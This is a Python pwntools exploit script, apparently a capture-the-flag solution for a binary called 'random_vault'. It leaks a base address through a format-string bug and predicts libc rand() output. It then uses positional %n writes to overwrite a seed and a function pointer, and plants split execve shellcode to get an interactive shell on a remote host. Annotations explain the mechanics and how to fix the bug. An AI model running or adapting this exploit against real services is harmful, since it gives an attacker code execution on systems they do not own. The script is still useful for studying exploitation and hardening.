
```
from pwn import *
from ctypes import CDLL

# Target description: the script treats ./random_vault as a 64-bit x86 binary.
# The system libc is loaded in-process through ctypes so its srand()/rand()
# can be called locally further down.
context.arch = 'amd64'
elf = ELF('./random_vault', checksec=False)
libc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')

# Any command-line argument selects the remote endpoint; with none, the
# local binary is started instead.
if len(sys.argv) != 1:
    s = remote('68.183.204.108', 1245)
else:
    s = process('./random_vault')

def change_username(username):
    """Send *username* at the next ': ' prompt and return the service's echo.

    Reads up to the 'Hello, ' greeting, takes the remainder of that line
    (whitespace-stripped) and consumes one more line before returning.
    Uses the module-level tube ``s``.

    NOTE(review): callers in this script pass printf-style directives as the
    username, so the returned value is whatever the service's formatter
    produced rather than the literal input -- consistent with the username
    being used as a format string on the service side (inferred, the binary
    is not shown here).
    """
    s.sendlineafter(': ', username)
    s.recvuntil('Hello, ')
    greeting_rest = s.recvline()
    s.recvline()  # drop the line that follows the greeting
    return greeting_rest.strip()

def store(secrets):
    """Pick menu entry '2' and submit the first seven items of *secrets*.

    Each item is converted with str() and sent after a ': ' prompt, in index
    order 0..6. Uses the module-level tube ``s``.
    """
    s.sendlineafter('\n\n', '2')
    slot = 0
    while slot < 7:
        s.sendlineafter(': ', str(secrets[slot]))
        slot += 1

# Leak one pointer through the username echo and rebase the ELF on it.
# '%11$p' only yields a hex pointer if the service hands the username to a
# printf-style function as the format string (inferred from the int(..., 16)
# parse below); passing the username as an argument to a constant "%s" format
# on the service side would close this leak.
# 0x1750 is taken as the leaked pointer's offset from the image base; it is a
# build-specific constant that this script does not derive.
elf.address = int(change_username('%11$p'), 16) - 0x1750
# Python 2 print statement: as written the script does not run under Python 3.
print 'pie @ ' + hex(elf.address)

# Seed the local libc PRNG with the value that the payload further down writes
# to the address tagged "# seed", so the local rand() sequence can be compared
# with the target's.
seed = 176
libc.srand(seed)

# Low bytes of the first seven rand() values for this seed, as recorded by
# the author:
# [18, 99, 114, 124, 125, 143, 164]
# NOTE(review): the shellcode table labels its last entry 163, not 164 --
# confirm which index is correct.
print [libc.rand() & 0xff for i in range(7)]

# Index of the first non-zero entry; used below to compute the address that
# the function-pointer overwrite is aimed at (base + 0x5000 + 0x10 + offset * 8,
# i.e. 8 bytes per slot -- presumably the slot array starts at +0x5010).
offset = 114
# One 64-bit little-endian value per store() prompt. The trailing comments are
# the slot indices the author associates with each value (compare the rand()
# list printed above).
shellcode = [
0, # 18 (left zero)
0, # 99 (left zero)
0xd23148e08948, # 114
0x91969dd1bb489090, # 124
0x53dbf748ff978cd0, # 125
0x905e545752905f54, # 143
0x050f3bb0c031 # 163  NOTE(review): the rand() list above says 164 -- confirm
]

# Disassembly of the non-zero entries (bytes in memory order):

# slot 114:
#   48 89 e0                         mov    rax,rsp
#   48 31 d2                         xor    rdx,rdx

# slots 124-125 (one instruction straddles the slot boundary):
#   90                               nop
#   90                               nop
#   48 bb d1 9d 96 91 d0 8c 97 ff    movabs rbx,0xff978cd091969dd1
#   48 f7 db                         neg    rbx
#   53                               push   rbx

# slot 143:
#   54                               push   rsp
#   5f                               pop    rdi
#   90                               nop
#   52                               push   rdx
#   57                               push   rdi
#   54                               push   rsp
#   5e                               pop    rsi
#   90                               nop

# slot 163 (see NOTE above about 163 vs 164):
#   31 c0                            xor    eax,eax
#   b0 3b                            mov    al,0x3b    ; 0x3b = execve on x86-64 Linux
#   0f 05                            syscall

# Build the username that performs two positional format-string writes:
#   %<seed>c%27$n  prints `seed` characters, then stores that count through
#                  argument 27
#   %<k>c%28$hn    prints k more characters, then stores the low 16 bits of the
#                  running count through argument 28; k is chosen so those bits
#                  equal the low 16 bits of slot `offset`'s address
# Only 16 bits of the second target are replaced, so the upper bytes of the
# existing pointer are kept as they are.
# Defender note: both writes depend on the service using the username as the
# format string. Passing it as an argument to a constant format removes the
# primitive; glibc's _FORTIFY_SOURCE=2 additionally rejects %n in writable
# format strings.
p = '%{}c%27$n'.format(seed)
p += '%{}c%28$hn'.format((elf.address + 0x5000 + 0x10 + offset * 8 - seed) & 0xffff)
# Pad the directive part to 24 bytes so the two addresses start at a fixed
# position; presumably this is what lines them up with arguments 27 and 28
# (the target's stack layout is not visible here -- confirm).
p += 'X' * (24 - len(p))
p += p64(elf.address + 0x5008) # seed: destination of the %27$n write
p += p64(elf.address + 0x5000) # fptr: destination of the %28$hn write

# Menu entry '1', then the payload goes in as the new username.
s.sendlineafter('\n\n', '1')
change_username(p)

# Menu entry '2' (inside store): submit the seven slot values, then consume
# two response lines before handing the session to the terminal.
store(shellcode)
s.recvline()
s.recvline()

s.interactive()

```